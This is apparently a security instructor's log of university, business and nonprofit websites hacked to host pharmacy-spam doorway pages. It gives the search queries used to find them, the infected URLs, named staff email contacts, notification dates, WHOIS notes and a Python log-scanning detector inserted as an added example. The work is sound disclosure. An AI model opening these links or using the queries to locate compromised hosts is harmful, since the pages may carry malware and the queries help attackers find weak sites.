abuse@uns.ac.id

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGgQFjAIOB4&url=http%3A%2F%2Fekonomi.fkip.uns.ac.id%2F%3Fac-uk-buy-viagra&ei=SHqTUo24EczXoAT-64CwDQ&usg=AFQjCNEIGSsisNa_0zQsVkeI4yXh_SAb5w&sig2=EQUNyTPc4QvhNXFWT1r58w&bvm=bv.56988011,d.cGU
19. uga.edu
U of Georgia
security@uga.edu
abuse@uga.edu
sebailey@uga.edu
uc@uga.edu

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFYQFjAFOAo&url=http%3A%2F%2Fwww.forestry.uga.edu%2Fnews%2Fwp-content%2Fuploads%2F2013%2F02%2Fsql.php%3Fp%3Dbuy-viagra-in-vancouver&ei=g5iTUp-zL9jtoATGhILQCA&usg=AFQjCNErXq9q7nSvgwyUUmGNQdrm2otteg&sig2=3_amtwGrf8bpB8mMMcBQpg&bvm=bv.56988011,d.cGU
20. ambassador.edu
California
Registrar@ambassador.edu
security@ambassador.edu
abuse@ambassador.edu

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=31&ved=0CCsQFjAAOB4&url=http%3A%2F%2Fwww.ambassador.edu%2Fphp.php%3Fnunun%3Dvic.edu.au-buy-viagra%26nun%3D3&ei=eqKTUvfNIsHmoATotoH4Dg&usg=AFQjCNHy2RuGD_FjvXAiZQjrtzqvIh3GeQ&sig2=Sb7gSjtNQI6gneeFGC9nAA&bvm=bv.56988011,d.cGU
21. wku.edu
Western Kentucky University
wku@wku.edu
abuse@wku.edu
security@wku.edu
torie.cockriel@wku.edu

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=35&ved=0CEgQFjAEOB4&url=http%3A%2F%2Fip205-109.ieb.wku.edu%2Fsuccess.php%3Fkokok%3Dvic.edu.au-buy-viagra%26hoh%3D3&ei=eqKTUvfNIsHmoATotoH4Dg&usg=AFQjCNGBT3C5l-f7lrwVva6_KK3MZ0mUVw&sig2=VfP-2tQYGnlnRgXDSMkmiw&bvm=bv.56988011,d.cGU
22. harvard.edu
@harvard
president@harvard.edu
abuse@harvard.edu
security@harvard.edu
ranna_farzan@harvard.edu, scott_fields@harvard.edu

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CEgQFjAEOAo&url=http%3A%2F%2Fwww.hcs.harvard.edu%2Fiop%2Fwp-content%2Fuploads%2F2011%2F07%2F%3Fvn%3Dviagra-au%26f%3D2&ei=pKSTUpGINYP3oAT484KYCQ&usg=AFQjCNHqoyAj1Q5zxY9rDNxlBUwizH5bRw&sig2=727rDcHGz7vJExtz9b4Pig&bvm=bv.56988011,d.cGU
23. www.sutherlandclinic.com
Tennessee
Cbmaccallum@sutherlandclinic.com
abuse@sutherlandclinic.com
security@sutherlandclinic.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CDQQFjAB&url=http%3A%2F%2Fwww.sutherlandclinic.com%2Fcardiologyexperts.html&ei=hqeTUrvqNcH6oASUzYDwBg&usg=AFQjCNHnHdwsOKlVdDzVeuPtxTm75BqQmQ&sig2=wLSIsaLDlFSfRFBtLmybTQ&bvm=bv.56988011,d.cGU

15. NZ infected colleges (11-25-13)

I used these Google searches:
inurl:ac.nz intitle:viagra
Organization Emails Malicious URL
1. apsa.ac.nz
U. of Auckland
admin@auckland.ac.nz
abuse@auckland.ac.nz
studentinfo@auckland.ac.nz
t.greene@auckland.ac.nz
fmhsweb@auckland.ac.nz

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CG8QFjAI&url=http%3A%2F%2Fapsa.ac.nz%2F%3Fp%3Dhow-to-buy-viagra-30-pills-in-uk%26eq%3Dviagra&ei=2ZmTUpb8CYbxoATb54LwDg&usg=AFQjCNG88Lge4bgaz-zAsO1gUTlvPOfA8Q&sig2=HT-n7MYj7ByYEaS89bDanQ&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHYQFjAJ&url=http%3A%2F%2Fapsa.ac.nz%2F%3Fp%3Dbuy-female-viagra-30-pills-100-mg-76-06usd-overnight-shipping%26iq%3Dfemale-viagra&ei=2ZmTUpb8CYbxoATb54LwDg&usg=AFQjCNHRijndrYs1Iz-f0uQfrlgnjG_3ig&sig2=PHmj6FeWBjenUqBAAtqnqQ&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CCsQFjAAOAo&url=http%3A%2F%2Fapsa.ac.nz%2F%3Fp%3Dfemale-viagra-without-prescriptione%26dv%3Dfemale-viagra&ei=GpuTUqbOMtTToASg2YCoAQ&usg=AFQjCNGu4F9IhryCu7I9tnANUFUzxZ4wNA&sig2=cYkn6lHL-iw1lihdzTr_Ig&bvm=bv.56988011,d.cGU

16. AU infected colleges (11-25-13)

I used these Google searches:
inurl:.edu.au intitle:viagra
inurl:.au intitle:viagra school
Organization Emails Malicious URL
1. usyd.edu.au
U. of Sydney
admin@sydney.edu.au
abuse@sydney.edu.au
vice.chancellor@sydney.edu.au

Notified 11-25-13

http://acl.arts.usyd.edu.au/threecities/index.php?option=com_content&task=view&itemes=viagra
2. icms.edu.au
International College of Management, Sydney
admin@icms.edu.au
abuse@icms.edu.au
info@icms.edu.au
tmaillet@icms.edu.au
dshiell@icms.edu.au

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CD0QFjAC&url=http%3A%2F%2Fwww.icms.edu.au%2Fed%2Fviagra-online&ei=fZuTUqayKoXwoASOgILYDw&usg=AFQjCNEc1_-QU8CNZup221vUc_Y5kP6G0g&sig2=-Rug8h2yFcngyr_MdtJ96A&bvm=bv.56988011,d.cGU
3. www.bethany.sa.edu.au
Bethany Christian School
karen.julius@bethany.sa.edu.au
admin@is.sa.edu.au
abuse@is.sa.edu.au
office@ais.sa.edu.au

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CEYQFjAD&url=http%3A%2F%2Fwww.bethany.sa.edu.au%2Findex.php%3Fid%3D217572&ei=fZuTUqayKoXwoASOgILYDw&usg=AFQjCNF8hKuGYFfGffkKzmwv1NzJbsYdrw&sig2=rMyltfzj63ZTHPCvxj_qLA&bvm=bv.56988011,d.cGU
4. www.unsw.edu.au
U. of New South Wales
https://twitter.com/unsw
admin@unsw.edu.au
abuse@unsw.edu.au
vice-chancellor@unsw.edu.au
shane.coxATunsw.edu.au

Notified 11-25-13

https://collab.phys.unsw.edu.au/gens4015/index.php/Viagra

https://collab.phys.unsw.edu.au/gens4015/index.php/Generic_viagra

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CEAQFjADOAo&url=http%3A%2F%2Fmembranes.edu.au%2Fblog%2Fhkiu%2Flopybis-buying-using-paypal%2F&ei=X6GTUtuYFcLroAT8mYLACA&usg=AFQjCNHY_lt3svo4go_y6u6n5WF1wWYqJw&sig2=fQ7LGGhrwWBMoN2vVEkJ7g&bvm=bv.56988011,d.cGU

That one redirects to a viagra site that is down now, but the infection is still present on your server

5. qsma.org.au
Queensland Self-Management Alliance
admin@arthritis.org.au
abuse@arthritis.org.au
helene@arthritis.org.au

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=24&ved=0CEIQFjADOBQ&url=http%3A%2F%2Fqsma.org.au%2Fdmdocuments%2FMzA4.html&ei=oqWTUuWxJc_zoAS-4YCgBg&usg=AFQjCNHH4JAOU2OLcZrb6Qgjk1WSSN87gA&sig2=PWR2uVU7Ovf09PY8IltR-g&bvm=bv.56988011,d.cGU&cad=rja

17. More notifications (11-25-13)

I decided to notify all the small businesses and other companies outside the UK I have listed above.

Here's the letter I used:

Subject: Infection on Your Server

Hello:

I am Sam Bowne, an Instructor in Computer Networking and Information Technology at City College San Francisco.

Your web server has been hacked, and is being used to drive traffic to a site selling Viagra. This is a form of identity theft, stealing your good reputation.

To see the infection, visit the URL below. I recommend using a Mac or Linux machine to perform this test because the pages that open may contain malware.

Please alert your webmaster.

Many companies I have warned simply deleted the infected files, but they often restore themselves. I would like to do a more thorough analysis of this malware to guide people in cleaning it.

If you are interested in joining a working group to analyze this infection, please email me.

Details are here: http://samsclass.info/125/proj11/subtle-infect.htm

18. Top "Buy Viagra" Hits (11-27-13)

My current hypothesis of how this scam works is that the hacked colleges and businesses are used to deliver links for black-hat Search Engine Optimization, to cause the Russian "Canadian Pharmacy" sites to rise in Google searches.

So the colleges I have been notifying are really secondary to the monetization of the scheme.

To hit this thing at its root, it seems valuable to get the sites that directly make money for them: online viagra sales.
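A site owner who wants to know whether their own server is one of these link-delivery hosts can start with the access log: the doorway URLs listed on this page carry drug names in the path or query string, and visitors reach them from search results. The sketch below is an added example, not part of the original page; the log lines, IP addresses and paths are constructed, and it assumes the Apache "combined" log format.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# Drug names that appear in the doorway URLs listed on this page.
PHARMA = re.compile(r"viagra|cialis|levitra|tadalafil|vardenafil", re.I)

# Apache "combined" log format (assumed; adjust for a custom LogFormat).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Matches google.com plus country variants such as google.co.uk, google.com.au.
GOOGLE_HOST = re.compile(r"(^|\.)google\.(com|[a-z]{2}|co\.[a-z]{2}|com\.[a-z]{2})$")


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_search_referer(referer):
    """True when the Referer header points at a Google host."""
    host = (urlsplit(referer).hostname or "").lower()
    return GOOGLE_HOST.search(host) is not None


def find_doorways(lines):
    """Collect requests whose decoded path or query contains a drug name."""
    hits = defaultdict(lambda: {"total": 0, "from_search": 0, "statuses": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip lines that are not in the expected format
        target = unquote(rec["target"])  # decode %2D etc. before matching
        if not PHARMA.search(target):
            continue
        entry = hits[target]
        entry["total"] += 1
        entry["statuses"].add(rec["status"])
        if is_search_referer(rec["referer"]):
            entry["from_search"] += 1
    return hits


def report(lines):
    """Return findings sorted by search-referred hits, most first."""
    findings = []
    for target, e in find_doorways(lines).items():
        # A 2xx/3xx answer means the server really served or redirected the URL;
        # a 404 only shows that someone asked for it.
        served = any(s[0] in "23" for s in e["statuses"])
        findings.append({
            "target": target,
            "total": e["total"],
            "from_search": e["from_search"],
            "served": served,
            "suspect": served and e["from_search"] > 0,
        })
    return sorted(findings, key=lambda f: (-f["from_search"], f["target"]))


# Constructed sample log lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = """\
203.0.113.7 - - [27/Nov/2013:10:01:02 +0000] "GET /order-viagra-uk/ HTTP/1.1" 200 18231 "https://www.google.com/url?sa=t&q=buy+viagra" "Mozilla/5.0"
198.51.100.4 - - [27/Nov/2013:10:03:40 +0000] "GET /order-viagra-uk/ HTTP/1.1" 200 18231 "https://www.google.co.uk/search?q=viagra" "Mozilla/5.0"
192.0.2.10 - - [27/Nov/2013:10:05:11 +0000] "GET /about/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [27/Nov/2013:10:06:30 +0000] "GET /uploads/x.php?p=buy%2Dcialis%2Donline HTTP/1.1" 302 0 "https://www.google.com/" "Mozilla/5.0"
192.0.2.12 - - [27/Nov/2013:10:07:00 +0000] "GET /pharmacy/levitra-info HTTP/1.1" 404 312 "-" "curl/7.30"
malformed line
"""

if __name__ == "__main__":
    for f in report(SAMPLE_LOG.splitlines()):
        flag = "SUSPECT" if f["suspect"] else "check"
        print(f'{flag:8} {f["from_search"]}/{f["total"]} from search  {f["target"]}')
```

A match is only a candidate: a clinic or pharmacy school can legitimately serve pages with these words, so each flagged path still has to be compared against what the site is supposed to publish.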

I used these Google searches:

buy viagra
buy viagra online
Organization Emails Malicious URL
Hit 1. tobuyviagra.com
Whois leads to:
http://privacyprotect.org/contact/

Reported on 11-27-13

http://tobuyviagra.com/
Directly hosted page
Hit 2. prototypeplayground.net
Incomplete site, looks abandoned
Whois leads to:
IBRENNAN@B-ARCH.COM
abuse@a2hosting.com

Notified 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CEUQFjAB&url=http%3A%2F%2Fprototypeplayground.net%2F%3Frvt%3D43&ei=tkGWUoaYJJLioAT924KABg&usg=AFQjCNFd1i9_uAuE_m05o9sx43tdH0i5EA&sig2=6U3EGHKf7rTHEy79iMzohg&bvm=bv.57155469,d.cGU
Hits 3 and 4.
thiefandbandit.com
Previously contacted
Hit 5. columbiagreenhouse.com
Nursery School in New York
info@columbiagreenhouse.com
info@sunraycomputer.com

Notified 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CFoQFjAE&url=http%3A%2F%2Fcolumbiagreenhouse.com%2Foldsite%2Fphotos%2F1%2F%3Ft%3D493&ei=tkGWUoaYJJLioAT924KABg&usg=AFQjCNHkz0Bfywio3VD3-Ynd3KpcDgOjEg&sig2=AY1lTmrGq1xvVjlW9shq6A&bvm=bv.57155469,d.cGU&cad=rja
Hit 6. viagra.com
Looks like a legitimate pharmacy site!
http://www.viagra.com/buy-real-viagra.aspx
Hit 7. yelp.com
Legitimate site
http://www.yelp.com/search?find_desc=viagra&find_loc=San+Francisco%2C+CA
Hit 8. canadadrugs.com
Looks legitimate
https://www.canadadrugs.com/products/viagra
Hit 9. coreynahman.com
Looks legitimate
http://www.coreynahman.com/viagra.html
Hits 10-11. anewwayoflife.org
Site was down, but came back up on 11-30-13
Twitter: @SusanBurtonLA

Informed 11-30-13

http://anewwayoflife.org/buy-viagra-perth/

http://anewwayoflife.org/buy-viagra-store/

Hit 12. vosh.org
VOLUNTEER OPTOMETRIC SERVICES TO HUMANITY
http://vosh.org/contact

Notified 11-27-13

http://www.vosh.org/viagraonline/
Directly hosted
Hit 13. buyviagraonlineman.com
Whois shows:
Owner Name: Whois Protection
Owner Street: Fablovka 404 (All postal mail rejected)
Owner City: Pardubice
Owner ZIP: 53352
Owner Country: CZ
Owner E-Mail: buyviagraonlineman.com@fablovkawhoisprotection.com
Nameserver: ns.masterhost.ru
Nameserver: ns2.masterhost.ru
Nameserver: ns1.masterhost.ru
A Czech anonymizer with a Russian DNS server; looks like the center of the operation. I doubt anyone there cares about them hacking colleges outside Russia, anyway.
http://buyviagraonlineman.com/
Hit 14-15. www.iospress.nl
Previously notified
Hit 16. sedl.org
Already cleaned! https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CG8QFjAFOAo&url=http%3A%2F%2Fautism.sedl.org%2Findex.php%2Fabout-us&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNF04D1usOzrM_WTi9iKqfW1yDYwRQ&sig2=0DyJZ2LRBatr0LwV4SVG3A&bvm=bv.57155469,d.cGU
Hit 17. kotous.com
Already cleaned! https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CHgQFjAGOAo&url=http%3A%2F%2Fkotous.com%2Fcontact-us%2F&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNFbXdGZWiGuIcZfSltwPJwdufInug&sig2=puKYoDZg2lep7EkTKaTWMA&bvm=bv.57155469,d.cGU
Hit 18. larkenrose.com
Already cleaned! https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CIABEBYwBzgK&url=http%3A%2F%2Fwww.larkenrose.com%2Fstore.html&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNEeIKGkJg-2YhCc2AFkz142pFuAZw&sig2=ysxTuu4bJ_nGztS7-RIHaw&bvm=bv.57155469,d.cGU
Hit 19. becomehealthyandrich.com
A front for the same scammers; most links are broken, and the one that works goes to one of the same pages
Whois:
Registrar WHOIS Server: whois.dynadot.com
Registrar: DYNADOT LLC
Registrar IANA ID: 472
Registrar Abuse Contact Email: Email Masking Image@dynadot.com
Registrant Name: Gareev Anatoliy
Registrant Street: Khokhryakova, 2, 15
Registrant City: Perm
Registrant State/Province: Perm
Registrant Postal Code: 614000
Registrant Country: RU
Registrant Email: Email Masking Image@gmail.com
Name Server: ns1.dietrichnames.com
Name Server: ns2.dietrichnames.com
Once again, that looks like people who probably don't care about the hacking these guys are doing.
http://becomehealthyandrich.com/
Hit 20. neara.org
NEW ENGLAND ANTIQUITIES RESEARCH ASSOCIATION
deveau@chebucto.ns.ca
danleary@mrf-furnaces.com
krosspt@lincoln.midcoast.com

Notified 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CJABEBYwCTgK&url=http%3A%2F%2Fneara.org%2F%3Fcbe%3D819&ei=mkmWUtWsBdXroATGg4HABg&usg=AFQjCNFO3d8aBdbePz5xvmesAPwfKG3iVg&sig2=mxfQ9TOraOaroILDR8Gg2A&bvm=bv.57155469,d.cGU
Hit 30. pharmacyathome.com
A scam site according to
http://www.scamadviser.com/check-website/pharmacyathome.com

http://www.pharmacyathome.com/
Hit 31. absecon.com
Site unfinished, but links to http://abseconfrp.com/Home_Page.php, a mill in NJ
composites@absecon.com
abuse@absecon.com
security@absecon.com

Notified 11-27-13

http://www.absecon.com/buy-cheap-viagra/

Many more linked from that page

Hits for "buy viagra online"

Hit 4 icheapviagraonline.com
Hosting one of the known scam pages
Whois shows a site registered privately in China.

But they use ClouDNS servers, and they have an abuse form here:
http://www.cloudns.net/contact/

Reported 11-27-13


Hit 7. longislandassociation.org
KLaw@longislandassociation.org
mcohen@longislandassociation.org

Notified 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CHEQFjAG&url=http%3A%2F%2Fwww.longislandassociation.org%2Fprinters%2F&ei=eFaWUr2WAYjooASo-YCwCg&usg=AFQjCNGmFrSsYf0tyBbsa88MsNOQh3kTkA&sig2=ZEqZcFYj3mrYSLBGkXbn0A&bvm=bv.57155469,d.cGU
Hit 9. harvestworks.org
Already cleaned! https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CIEBEBYwCA&url=http%3A%2F%2Fwww.harvestworks.org%2F&ei=eFaWUr2WAYjooASo-YCwCg&usg=AFQjCNEoRhXS212-VVkrLPF6xdvKaYERnw&sig2=2AJG85ij6TUvMXzt1Dccxg&bvm=bv.57155469,d.cGU
Hit 10. accessrx.com
Seems legitimate

Hit 11. stbf.org
Strengthening The Black Family, Incorporated, NC
nikki.smith@co.wake.nc.us
torraine@torraine.com

Notified 11-27-13

http://www.stbf.org/viagra/

And many other pages linked to from that page

Linked from stbf.org: calsport.org
bjennings@calsport.org
webmaster@calsport.org

http://calsport.org/cialis-cost/

And many other pages linked to from that page

Linked from stbf.org: growandknow.org
NYC
marni@growandknow.org
marni.summer@gmail.com
http://growandknow.org/order-viagra/

And many other pages linked to from that page

Hit 14. nfayearbooks.com
Newburgh Free Academy
Alerted by contact form 11-27-13 https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CFIQFjADOAo&url=http%3A%2F%2Fnfayearbooks.com%2F%3Fnfa%3D147&ei=zFmWUreqOcj2oAS4mIH4DA&usg=AFQjCNHvbMVLhM-OtysNebGQOWvFnYZZ8g&sig2=UDaWFK1voZ9j702tX7zNIA&bvm=bv.57155469,d.cGU
Hit 19. qhull.org
Part of uiuc.edu (My alma mater!)
qhull@qhull.org
webmaster@www.geom.uiuc.edu
https://illinois.edu/fb/sec/7175665

Notified 11-27-13

http://www.qhull.org/get-viagra-without-prescription/
Hit 20. whiteswanrecords.com
feedback@whiteswanrecords.com
http://cccc.co.za/contact/

Notified 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CIMBEBYwCTgK&url=http%3A%2F%2Fwww.whiteswanrecords.com%2Fwebcomunity%2F&ei=zFmWUreqOcj2oAS4mIH4DA&usg=AFQjCNEuDUjPGMF511XB_epwsPjgjY4Fhw&sig2=Ve5vzSPQwh94djFgBMAApg&bvm=bv.57155469,d.cGU

Hits for "Buy Cialis"

Hit 1-2. easyteammanager.com and drury.edu
Already cleaned!
Hit 3. epmonthly.com
Emergency Physicians Monthly, NY
mplaster@epmonthly.com
editor@epmonthly.com
info@epmonthly.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CFgQFjAC&url=http%3A%2F%2Fwww.epmonthly.com%2Fadvertise%2F&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNGcBxkYuED8Ll9C-K-UXIRhBp0eVA&sig2=XerqOWvX5isgvyuhZZ1jbQ&bvm=bv.57155469,d.cGU
Hit 4. enconline.com
ElDorado National, bus manufacturer, CA and KS
info@eldorado-ca.com
rmendoza@eldorado.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CGEQFjAD&url=http%3A%2F%2Fwww.enconline.com%2Fbuycialisonline%2F&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNG4uz8gygcQtQqRIVWLoJRUY4uRGQ&sig2=Gcq1hPZAWz-nEn53xfqseg&bvm=bv.57155469,d.cGU
Hit 5. fabrand.com
Seller of duck decoys, KS
abuse@fabrand.com
security@fabrand.com
jdavis@bushnell.com
abuse@godaddy.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CGkQFjAE&url=http%3A%2F%2Fwww.fabrand.com%2Fbuycialis%2F&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNGggBh5qW6-y0vZbJeyMRnrNBwr2A&sig2=oszw8VqQGtnGbduDlye4ag&bvm=bv.57155469,d.cGU
Hit 6. bobburdenski.com
Fund-raising trainer in Chicago
Info@BobBurdenski.com
Abuse@BobBurdenski.com
security@BobBurdenski.com
@annualfund on Twitter

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CHEQFjAF&url=http%3A%2F%2Fwww.bobburdenski.com%2Fnc.php&ei=OXGXUpS3GozvoATImoCwBQ&usg=AFQjCNF-4s_C1bx03EfQa_Fj7SAs2VMR_w&sig2=cwUZNQJEBShddPgxj__iIg&bvm=bv.57155469,d.cGU
Hit 7-10 look legitimate.
http://www.scamadviser.com/is-buycialisonlineusa.biz-a-fake-site.html
Hit 13. selectyourgifts.com
service@selectyourgifts.com
This is apparently a scam site
http://inspirationforeverydaylife.blogspot.com/2009/01/scam-alert-wwwselectyourgiftscom.html
Hit 14. vanguarddefense.com
Manufacturer of drones in Texas
info@vanguarddefense.com
media@vanguarddefense.com
security@vanguarddefense.com
abuse@vanguarddefense.com

Twitter: @schipul @Tendenci

Notified 11-28-13

http://vanguarddefense.com/Cialis
http://vanguarddefense.com/buy-cialis
Hit 16-17. anewwayoflife.org
Website is damaged, cannot load the selling pages

Hit 19. icrisat.org
Crops research org.
Twitter: @icrisat @CGIAR

ICRISAT@CGIAR.ORG
ICRISAT-Nairobi@cgiar.org

Notified 11-28-13

http://www.icrisat.org/cialis/
Hit 20. emilystrange.com
Clothing and games
noah@osmicDebris.com

Twitter: @EmilyTheStrange

Notified 11-28-13

http://www.emilystrange.com/compress/
Hit 23. advantageconnectpro.com/
info@advantageconnectpro.com
Informed via live chat

Notified 11-28-13

http://advantageconnectpro.com/acp/tadalafil-canada
Hit 23. apoptic.com
A blog from California
apoptic@gmail.com
abuse@godaddy.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=23&ved=0CFoQFjACOBQ&url=http%3A%2F%2Fwww.apoptic.com%2Fbota%2Fbuy-cialis&ei=E3-XUsXTGIb5oASAu4HwAw&usg=AFQjCNHjCKp-tb-oUff3KzkIeNBrA113Pg&sig2=uIJ9dlrt6gq87QeA6GJM-g&bvm=bv.57155469,d.cGU
Hit 25. ephudson.com
A band, I think
Twitter: @ep_hudson @PhillnMyself @_kosher

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=25&ved=0CGoQFjAEOBQ&url=http%3A%2F%2Fephudson.com%2Fwhere-buy-cialis%2F&ei=E3-XUsXTGIb5oASAu4HwAw&usg=AFQjCNG7mJ_BKg7EMqWHWFpD8q4xn2gqjg&sig2=7vXOnx538p_bweUCUEWlsg&bvm=bv.57155469,d.cGU
Hit 27. lamazoucheese.com
Cheese seller in NYC
lamazouinc@yahoo.com
hachhouch@gmail.com
domain.tech@yahoo-inc.com

Notified 11-28-13

http://lamazoucheese.com/buy_cialis_online
Hit 29. www.bsfsry.com
Big Fork Scenic Railway, KY
info@bsfsry.com
abuse@godaddy.com
busmgr@bsfsry.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=29&ved=0CIYBEBYwCDgU&url=http%3A%2F%2Fwww.bsfsry.com%2Forder-cialis%2F&ei=E3-XUsXTGIb5oASAu4HwAw&usg=AFQjCNGDcrRXkh9-mE12psa8GMnP0GffyA&sig2=JNcFVZ-wL6Kg99Pl7Cl_hQ&bvm=bv.57155469,d.cGU
Hit 30. ysunews.com
Youngstown State University, OH
techdesk@ysu.edu
abuse@ysu.edu
security@ysu.edu
mbailey@ysu.edu
clbidwell@ysu.edu

Twitter: @YSUPolice @youngstownstate

Notified 11-28-13

http://www.ysunews.com/buy-cialis-professional/

Hits for "Buy Cialis Online"

Hit 20. rubinsboston.com
Restaurant in Boston, MA
tiffcfeng@gmail.com
bostonuadlab@gmail.com
info@rubinsboston.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=20&ved=0CI8BEBYwCTgK&url=http%3A%2F%2Frubinsboston.com%2Fbuy-cialis-online-usa%2F&ei=JomXUug40eigBJzkgYAE&usg=AFQjCNFsDdnlKcmJGS1Sk_WzkaQvLqAVVg&sig2=qM58_P3b_9s2VAUJdczyUg&bvm=bv.57155469,d.cGU
Hit 21. elkton.org
Town of Elkton, MD
Twitter: @TownofElkton

administration@elkton.org
finance@elkton.org
mdonnelly@elktonpd.org

Notified 11-28-13

http://www.elkton.org/sec/
Hit 24. camdenhealth.org
Camden Coalition of Healthcare Providers, NJ
http://www.camdenhealth.org/contact-us/

Twitter: @camdenhealth

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=24&ved=0CFEQFjADOBQ&url=http%3A%2F%2Fwww.camdenhealth.org%2Flogin-options%2F&ei=yIqXUpGCEov8oATE24DgDw&usg=AFQjCNEn7PmNWUPZRmGUDC3R06LrKw026Q&sig2=FgkDg5a_J3kJ9pguNNyv-Q&bvm=bv.57155469,d.cGU
Hit 32. imintcenter.org
DARPA Research Center, U. of Colorado
leeyc@colorado.edu
fitzstephens@colorado.edu

Twitter: @cuboulder

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=32&ved=0CEIQFjABOB4&url=http%3A%2F%2Fwww.imintcenter.org%2F&ei=FY2XUu70FsbpoATDioL4Cw&usg=AFQjCNH39noUwCOMi2va9wg_IATUF2zNQQ&sig2=vqeIlTmoSm0OgtOm5CdS3g&bvm=bv.57155469,d.cGU
Hit 33. thesemblog.com
Web marketing company

along@schipul.com
abuse@schipul.com
security@schipul.com

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=33&ved=0CEkQFjACOB4&url=http%3A%2F%2Fthesemblog.com%2FCialis%2F&ei=FY2XUu70FsbpoATDioL4Cw&usg=AFQjCNEW3JLQKT-8e3iXVcfQik7L8dubIg&sig2=6tDldtS5X78vDML-7emR-Q&bvm=bv.57155469,d.cGU

Hits for "Buy Levitra"

Hit 1. amahouston.net
Marketing in Texas
info@amahouston.org

Loaded the rogue page once, but not again?

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CD8QFjAA&url=http%3A%2F%2Famahouston.net%2Fpage%2F2%2F&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNHhyjsT9CxOmYcsHOezVeCqMxEJ2g&sig2=KY0DGCO5y3iBfWXJ8jrCag&bvm=bv.57155469,d.cGU
Hit 3. www.workamper.com
Employment in Arkansas
support@workamper.com
john@workamper.com

Notified 11-28-13

http://www.workamper.com/buyvardenafil/
Hit 5. missillinois.org
ILStateDir@missillinois.org
statedirector@missillinois.org

Notified 11-28-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CGEQFjAE&url=http%3A%2F%2Fmissillinois.org%2Fbuy-levitra-now%2F&ei=ypGXUqjGGtbXoAT47oG4Bg&usg=AFQjCNFY-ZoBxQ14fbGabwcZU6OIgpEt2A&sig2=XOQDMQ7cf4NqMJ-2blkXbg&bvm=bv.57155469,d.cGU
Hit 6. www.theoriginalscrapbox.com
http://www.theoriginalscrapbox.com/contacts

Notified 11-28-13

